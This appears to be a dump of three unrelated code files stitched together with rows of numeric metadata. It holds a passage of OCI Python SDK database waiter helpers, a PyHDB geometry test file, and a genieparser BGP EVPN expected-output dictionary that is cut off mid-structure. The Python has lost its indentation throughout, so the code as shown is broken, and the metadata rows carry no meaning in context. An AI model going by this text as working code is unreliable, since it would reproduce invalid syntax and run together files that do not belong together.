try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def upgrade_database_and_wait_for_state(self, database_id, upgrade_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.upgrade_database` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpgradeDatabaseDetails upgrade_database_details: (required)
Request to perform a database upgrade.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.upgrade_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.upgrade_database(database_id, upgrade_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def validate_vm_cluster_network_and_wait_for_work_request(self, exadata_infrastructure_id, vm_cluster_network_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.validate_vm_cluster_network` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str vm_cluster_network_id: (required)
The VM cluster network `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.validate_vm_cluster_network`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.validate_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def validate_vm_cluster_network_and_wait_for_state(self, exadata_infrastructure_id, vm_cluster_network_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.validate_vm_cluster_network` and waits for the :py:class:`~oci.database.models.VmClusterNetwork` acted upon
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str vm_cluster_network_id: (required)
The VM cluster network `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmClusterNetwork.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.validate_vm_cluster_network`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.validate_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster_network(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
| 60.687686 | 266 | 0.717799 | 66,875 | 530,289 | 5.401675 | 0.007073 | 0.065987 | 0.050872 | 0.020518 | 0.991507 | 0.98984 | 0.987191 | 0.983803 | 0.979504 | 0.974964 | 0 | 0.000107 | 0.209177 | 530,289 | 8,737 | 267 | 60.694632 | 0.861283 | 0.485239 | 0 | 0.849624 | 0 | 0 | 0.027185 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063331 | false | 0 | 0.000578 | 0 | 0.151822 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
35afb51f8ca9e3d0b12d67272ca087d9eb140b80 | 12,166 | py | Python | tests/types/test_geometry.py | peterandluc/PyHDB | 826539d06b8bcef74fe755e7489b8a8255628f12 | [
"Apache-2.0"
] | 332 | 2015-01-03T21:50:28.000Z | 2021-04-28T08:37:18.000Z | tests/types/test_geometry.py | peterandluc/PyHDB | 826539d06b8bcef74fe755e7489b8a8255628f12 | [
"Apache-2.0"
] | 132 | 2015-01-12T10:26:09.000Z | 2021-05-04T17:46:34.000Z | tests/types/test_geometry.py | peterandluc/PyHDB | 826539d06b8bcef74fe755e7489b8a8255628f12 | [
"Apache-2.0"
] | 147 | 2015-01-10T16:25:29.000Z | 2021-04-08T08:02:20.000Z | from io import BytesIO
import random
#
import pytest
from pyhdb.protocol import types
# ########################## Test value unpacking #####################################
@pytest.mark.parametrize("given,expected", [
(b"\xFF", None),
(b"\x2d\x50\x4f\x49\x4e\x54\x20\x28\x31\x2e\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32\x2e\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29",
"POINT (1.0000000000000000 2.0000000000000000)"),
(b"\x59\x4c\x49\x4e\x45\x53\x54\x52\x49\x4e\x47\x20\x28\x31\x2e\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32\x2e" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c" + \
b"\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x29",
"LINESTRING (1.0000000000000000 2.0000000000000000, " + \
"2.0000000000000000 1.0000000000000000)"),
(b"\xa7\x50\x4f\x4c\x59\x47\x4f\x4e\x20\x28\x28\x31\x2e\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x30" + \
b"\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x2c\x20\x2d\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x31\x2e\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29\x29",
"POLYGON ((1.0000000000000000 1.0000000000000000, " + \
"0.0000000000000000 0.0000000000000000, " + \
"-1.0000000000000000 1.0000000000000000, " + \
"1.0000000000000000 1.0000000000000000))"),
(b"\x32\x4d\x55\x4c\x54\x49\x50\x4f\x49\x4e\x54\x20\x28\x31\x2e\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32\x2e" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29",
"MULTIPOINT (1.0000000000000000 2.0000000000000000)"),
(b"\x60\x4d\x55\x4c\x54\x49\x4c\x49\x4e\x45\x53\x54\x52\x49\x4e\x47\x20" + \
b"\x28\x28\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x2c\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29\x29",
"MULTILINESTRING ((1.0000000000000000 2.0000000000000000, " + \
"2.0000000000000000 1.0000000000000000))"),
(b"\xae\x4d\x55\x4c\x54\x49\x50\x4f\x4c\x59\x47\x4f\x4e\x20\x28\x28\x28" + \
b"\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x2c\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x2d\x31\x2e\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x31" + \
b"\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x29\x29\x29",
"MULTIPOLYGON (((1.0000000000000000 1.0000000000000000, " + \
"0.0000000000000000 0.0000000000000000, " + \
"-1.0000000000000000 1.0000000000000000, " + \
"1.0000000000000000 1.0000000000000000)))"),
])
def test_unpack_geometry_wkt(given, expected):
given = BytesIO(given)
assert types.Geometry.from_resultset(given) == expected
# ########################## Test value packing #####################################
@pytest.mark.parametrize("given,expected", [
(None, b"\x1d\xFF", ),
("POINT (1.0000000000000000 2.0000000000000000)",
b"\x1d\x2d\x50\x4f\x49\x4e\x54\x20\x28\x31\x2e\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32\x2e\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29"),
("LINESTRING (1.0000000000000000 2.0000000000000000, " + \
"2.0000000000000000 1.0000000000000000)",
b"\x1d\x59\x4c\x49\x4e\x45\x53\x54\x52\x49\x4e\x47\x20\x28\x31\x2e\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32" + \
b"\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x2c\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x29"),
("POLYGON ((1.0000000000000000 1.0000000000000000, " + \
"0.0000000000000000 0.0000000000000000, " + \
"-1.0000000000000000 1.0000000000000000, " + \
"1.0000000000000000 1.0000000000000000))",
b"\x1d\xa7\x50\x4f\x4c\x59\x47\x4f\x4e\x20\x28\x28\x31\x2e\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20" + \
b"\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x2c\x20\x2d\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x31\x2e\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29\x29"),
("MULTIPOINT (1.0000000000000000 2.0000000000000000)",
b"\x1d\x32\x4d\x55\x4c\x54\x49\x50\x4f\x49\x4e\x54\x20\x28\x31\x2e\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32" + \
b"\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29"),
("MULTILINESTRING ((1.0000000000000000 2.0000000000000000, " + \
"2.0000000000000000 1.0000000000000000))",
b"\x1d\x60\x4d\x55\x4c\x54\x49\x4c\x49\x4e\x45\x53\x54\x52\x49\x4e\x47" + \
b"\x20\x28\x28\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x2c\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29\x29"),
("MULTIPOLYGON (((1.0000000000000000 1.0000000000000000, " + \
"0.0000000000000000 0.0000000000000000, " + \
"-1.0000000000000000 1.0000000000000000, " + \
"1.0000000000000000 1.0000000000000000)))",
b"\x1d\xae\x4d\x55\x4c\x54\x49\x50\x4f\x4c\x59\x47\x4f\x4e\x20\x28\x28" + \
b"\x28\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x2c\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x2d\x31\x2e\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20" + \
b"\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x29\x29\x29"),
])
def test_pack_geometry_wkt(given, expected):
assert types.Geometry.prepare(given) == expected
# #############################################################################################################
# Real HANA interaction with geormetry (integration tests)
# #############################################################################################################
import tests.helper
TABLE = 'PYHDB_TEST_GEOMETRY'
TABLE_POINT = TABLE + "_POINT"
TABLE_GEOMETRY = TABLE + "_GEOMETRY"
TABLE_FIELDS_POINT = "point ST_POINT NOT NULL"
TABLE_FIELDS_GEOMETRY = "geo ST_GEOMETRY NOT NULL"
@pytest.fixture
def test_table_point(request, connection):
tests.helper.create_table_fixture(request, connection, TABLE_POINT,
TABLE_FIELDS_POINT, column_table=True)
@pytest.fixture
def test_table_geometry(request, connection):
tests.helper.create_table_fixture(request, connection, TABLE_GEOMETRY,
TABLE_FIELDS_GEOMETRY, column_table=True)
@pytest.mark.hanatest
def test_insert_point(connection, test_table_point):
"""Insert spatial point into table"""
cursor = connection.cursor()
point_x = random.randint(-100.0, 100.0)
point_y = random.randint(-100.0, 100.0)
wkt_string = "POINT(%f %f)" % (point_x, point_y)
cursor.execute("insert into %s (point) values (:1)" % TABLE_POINT, [wkt_string])
connection.commit()
cursor = connection.cursor()
row = cursor.execute('select point.ST_X(), point.ST_Y() from %s' % TABLE_POINT).fetchone()
assert row[0] == point_x
assert row[1] == point_y
@pytest.mark.hanatest
def test_insert_linestring(connection, test_table_geometry):
"""Insert spatial linestring into table"""
cursor = connection.cursor()
point1_x = random.randint(-100.0, 100.0)
point1_y = random.randint(-100.0, 100.0)
point2_x = random.randint(-100.0, 100.0)
point2_y = random.randint(-100.0, 100.0)
wkt_string = "LINESTRING(%f %f, %f %f)" % (point1_x, point1_y, point2_x, point2_y)
cursor.execute("insert into %s (geo) values (:1)" % TABLE_GEOMETRY, [wkt_string])
connection.commit()
cursor = connection.cursor()
sql = """
Select geo.ST_StartPoint().ST_X(), geo.ST_StartPoint().ST_Y(),
geo.ST_EndPoint().ST_X(), geo.ST_EndPoint().ST_Y()
From %s
"""
row = cursor.execute(sql % TABLE_GEOMETRY).fetchone()
assert row[0] == point1_x
assert row[1] == point1_y
assert row[2] == point2_x
assert row[3] == point2_y
@pytest.mark.hanatest
def test_insert_polygon(connection, test_table_geometry):
"""Insert spatial polygon into table"""
cursor = connection.cursor()
# The edges of a polygon can not cross. Therefore we build an arbitrary quadtrangle.
point1_x = random.randint(0, 100.0)
point1_y = random.randint(0, 100.0)
point2_x = random.randint(0, 100.0)
point2_y = random.randint(-100.0, 0)
point3_x = random.randint(-100.0, 0)
point3_y = random.randint(-100.0, 0)
point4_x = random.randint(-100.0, 0)
point4_y = random.randint(0, 100.0)
wkt_string = "POLYGON((%f %f, %f %f, %f %f, %f %f, %f %f))" % (
point1_x, point1_y, point2_x, point2_y, point3_x, point3_y,
point4_x, point4_y, point1_x, point1_y
)
cursor.execute("insert into %s (geo) values (:1)" % TABLE_GEOMETRY, [wkt_string])
connection.commit()
cursor = connection.cursor()
# We don't want to check all points of the polygon.
# We will only check the minimal and maximal values.
sql = """
Select geo.ST_XMin(), geo.ST_XMax(), geo.ST_YMin(), geo.ST_YMax()
From %s
"""
row = cursor.execute(sql % TABLE_GEOMETRY).fetchone()
assert row[0] == min(point1_x, point2_x, point3_x, point4_x)
assert row[1] == max(point1_x, point2_x, point3_x, point4_x)
assert row[2] == min(point1_y, point2_y, point3_y, point4_y)
assert row[3] == max(point1_y, point2_y, point3_y, point4_y)
| 54.3125 | 111 | 0.63735 | 2,062 | 12,166 | 3.699806 | 0.067895 | 0.621313 | 0.815179 | 0.94534 | 0.836807 | 0.806397 | 0.762223 | 0.716477 | 0.709136 | 0.694586 | 0 | 0.33311 | 0.140802 | 12,166 | 223 | 112 | 54.556054 | 0.396728 | 0.034029 | 0 | 0.287179 | 0 | 0.384615 | 0.603918 | 0.455639 | 0 | 0 | 0 | 0 | 0.061538 | 1 | 0.035897 | false | 0 | 0.025641 | 0 | 0.061538 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
ea1fef20cf3476142874b17b0d6beadf41c5c109 | 14,742 | py | Python | src/genie/libs/parser/iosxe/tests/ShowIpBgpL2VPNEVPN/cli/equal/golden_output13_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowIpBgpL2VPNEVPN/cli/equal/golden_output13_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowIpBgpL2VPNEVPN/cli/equal/golden_output13_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | expected_output = {
'instance':{
'default':{
'vrf':{
'evi_11':{
'address_family':{
'l2vpn evpn':{
'prefixes':{
'[2][3.3.3.3:11][0][48][AABBCCDD0011][32][192.168.2.100]/24':{
'table_version':'30',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'AABBCCDD0011',
'ip_len':'32',
'ip_prefix':'192.168.2.100',
'subnet':'24'
},
'available_path':'2',
'best_path':'2',
'paths':'2 available, best #2, table evi_11',
'index':{
1:{
'next_hop':'55.55.55.55',
'gateway':'1.1.1.1',
'originator':'1.1.1.1',
'next_hop_via':'default',
'update_group':1,
'evpn':{
'evpn_esi':'00000000000000000000',
'label':10000,
'ext_community':'RT:3:11 RT:3:100 ENCAP:8 EVPN DEF GW:0:0'
},
'recipient_pathid':'0',
'transfer_pathid':'0'
},
2:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'evpn':{
'evpn_esi':'00000000000000000000',
'label':10000,
'ext_community':'RT:3:11 RT:3:100 ENCAP:8 EVPN DEF GW:0:0'
},
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[2][3.3.3.3:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36':{
'table_version':'31',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'AABBCCDD0011',
'ip_len':'128',
'ip_prefix':'2001:192:168:2::100',
'subnet':'36'
},
'available_path':'2',
'best_path':'2',
'paths':'2 available, best #2, table evi_11',
'index':{
1:{
'next_hop':'55.55.55.55',
'gateway':'1.1.1.1',
'originator':'1.1.1.1',
'next_hop_via':'default',
'update_group':1,
'evpn':{
'evpn_esi':'00000000000000000000',
'label':10000,
'ext_community':'RT:3:11 RT:3:100 ENCAP:8 EVPN DEF GW:0:0'
},
'recipient_pathid':'0',
'transfer_pathid':'0'
},
2:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'evpn':{
'evpn_esi':'00000000000000000000',
'label':10000,
'ext_community':'RT:3:11 RT:3:100 ENCAP:8 EVPN DEF GW:0:0'
},
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[2][3.3.3.3:11][0][48][D4E880B0D802][0][*]/20':{
'table_version':'4',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'D4E880B0D802',
'ip_len':'0',
'subnet':'20'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'localpref':100,
'weight':'32768',
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':1,
'route_info':'Local',
'imported_path_from':'[2][5.5.5.5:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36 (global)',
'evpn':{
'evpn_esi':'00000000000000000000',
'label':10000,
'ext_community':'RT:3:11 ENCAP:8'
},
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[2][3.3.3.3:11][0][48][D4E880B0D802][32][192.168.2.1]/24':{
'table_version':'5',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'D4E880B0D802',
'ip_len':'32',
'ip_prefix':'192.168.2.1',
'subnet':'24'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'localpref':100,
'weight':'32768',
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':1,
'route_info':'Local',
'imported_path_from':'[2][5.5.5.5:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36 (global)',
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[2][3.3.3.3:11][0][48][D4E880B0D802][128][2001:192:168:2::1]/36':{
'table_version':'6',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'D4E880B0D802',
'ip_len':'128',
'ip_prefix':'2001:192:168:2::1',
'subnet':'36'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'localpref':100,
'weight':'32768',
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':1,
'route_info':'Local',
'imported_path_from':'[2][5.5.5.5:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36 (global)',
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[2][3.3.3.3:11][0][48][D4E880B0D802][128][FE80::D6E8:80FF:FEB0:D802]/36':{
'table_version':'7',
'nlri_data':{
'route-type':'2',
'rd':'3.3.3.3:11',
'eti':'0',
'mac_len':'48',
'mac':'D4E880B0D802',
'ip_len':'128',
'ip_prefix':'FE80::D6E8:80FF:FEB0:D802',
'subnet':'36'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'localpref':100,
'weight':'32768',
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':1,
'route_info':'Local',
'imported_path_from':'[2][5.5.5.5:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36 (global)',
'local_vxlan_vtep':{
'vrf':'Red',
'vni':'100000',
'local_router_mac':'AC4A.67A4.1A51',
'vtep_ip':'33.33.33.33'
},
'recipient_pathid':'0',
'transfer_pathid':'0x0'
}
}
},
'[3][3.3.3.3:11][0][32][33.33.33.33]/17':{
'table_version':'14',
'nlri_data':{
'route-type':'3',
'rd':'3.3.3.3:11',
'eti':'0',
'ip_len':'32',
'orig_rtr_id':'33.33.33.33',
'subnet':'17'
},
'available_path':'1',
'best_path':'1',
'paths':'1 available, best #1, table evi_11',
'index':{
1:{
'next_hop':'::',
'gateway':'0.0.0.0',
'originator':'3.3.3.3',
'next_hop_via':'default',
'update_group':1,
'localpref':100,
'weight':'32768',
'origin_codes':'?',
'status_codes':'*>',
'refresh_epoch':1,
'route_info':'Local',
'imported_path_from':'[2][5.5.5.5:11][0][48][AABBCCDD0011][128][2001:192:168:2::100]/36 (global)',
'ext_community':'RT:3:11 ENCAP:8',
'pmsi':{
'tun_type':'IR',
'vni':'10000',
